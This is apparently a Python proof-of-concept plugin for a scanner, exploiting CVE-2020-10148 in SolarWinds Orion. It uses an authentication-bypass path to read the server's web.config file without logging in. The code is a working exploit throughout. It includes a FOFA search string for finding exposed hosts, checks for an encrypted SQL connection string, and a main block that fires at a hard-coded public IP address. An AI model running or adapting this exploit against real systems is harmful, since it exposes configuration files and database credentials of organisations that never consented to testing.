# coding:utf-8
import requests
requests.packages.urllib3.disable_warnings()

class c2Class(object):
	def __init__(self):
		self.vulname = 'SolarWinds Orion API RCE (CVE-2020-10148)'
		self.vulsystem= 'SolarWinds'
		self.vulsystemintro = 'SolarWinds是网络安全管理软件产品。'
		self.vulversion = 'Orion Version < 2020.2.1HF2 2019.4HF6'
		self.fofa='title="SolarWinds Orion"'
		self.findtime='2020-12'
		self.refer= 'https://blog.csdn.net/smellycat000/article/details/112057631\nhttps://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965/stargazers\nhttps://nosec.org/home/detail/4630.html'
		self.bbb='这个洞来源于FireEye的红队工具泄露，说是SolarWinds的Orion API可以绕过登录，进而导致rce，不过现在只有读文件的poc。20200114'
		self.testisok=True

		self.vulpath='/Orion/invalid.aspx.js'
		self.vulpath_webconfig='/web.config'
		self.vulpath_db='/SWNetPerfMon.db'
		self.flag=200
		self.flag2='SolarWinds.Orion.Core.Common.Configuration.WebCompressionSection, SolarWinds.Orion.Core.Common'
		self.flag3='Encrypted Connection String for SQL Server added by Orion Core Services'
		

	def c2Func(self,target):
		status=0
		returnData=''
		if target.startswith(('http://','https://')):
			if '/Orion/' in target:
				target=target[:target.index('/Orion/')]
			else: # 这是为了拿到 <http://主机名>这样格式的数据
				target=target+'/'
				target=target[:target.find('/',8)] # len('https://') = 8
		else:
			target='http://'+target
		try:
			url=target.strip('/')+self.vulpath
			resp=requests.get(url=url,verify=False)
			if (resp.headers['location']):
				index=resp.headers['location'].index('.i18n.ashx')
				leakedVersion = (resp.headers['location'][index:])
				if (leakedVersion.__contains__('v=')):
					urlGetWebConfig=target.strip('/')+self.vulpath_webconfig+leakedVersion
					leakedConfig=resp=requests.get(url=urlGetWebConfig,verify=False)
					if (leakedConfig.status_code == self.flag) and self.flag2 in leakedConfig.text:
						returnData='%s could be vulnerable.The vuln is %s.'\
						'The payload is [%s], u can get web.config by the payload.'%(target.strip('/'),self.vulname,urlGetWebConfig) 
						status=1
		except Exception as e:
			returnData=str(e)
		return status,returnData

if __name__ == '__main__':
	target='http://73.178.202.24:8080/'
	pocObj=c2Class()
	print(pocObj.c2Func(target))